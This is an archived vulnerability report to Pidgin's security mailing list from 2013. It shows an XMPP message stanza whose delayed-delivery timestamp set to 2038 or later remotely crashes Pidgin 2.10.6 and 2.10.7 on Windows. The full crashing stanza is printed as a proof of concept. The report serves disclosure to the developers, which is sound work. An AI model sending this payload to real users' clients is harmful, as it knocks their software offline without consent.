Remotely triggerable crash
Pho
phofin at gmail.com
Thu Sep 26 12:19:17 EDT 2013
I've been playing with the XEP-0203 (Delayed Delivery), and i've found that
the stanza:
<message type="chat" to="pho at jabberes.org/pichon" id="ab30a">
<body>die pidgin die</body>
<delay xmlns='urn:xmpp:delay' stamp='2038-09-10T23:05:37Z'/>
</message>
Remotely crashes (at least) pidgin 2.10.6 and 2.10.7 for Windows.
It just happens when the year is >=2038, and works on MUC too
There are some backtraces attached
--
May the force be with you.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://pidgin.im/cgi-bin/mailman/private/security/attachments/20130926/f9cd1a4f/attachment.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pidgin.RPT
Type: application/octet-stream
Size: 10404 bytes
Desc: not available
URL: <http://pidgin.im/cgi-bin/mailman/private/security/attachments/20130926/f9cd1a4f/attachment.obj>
More information about the security
mailing list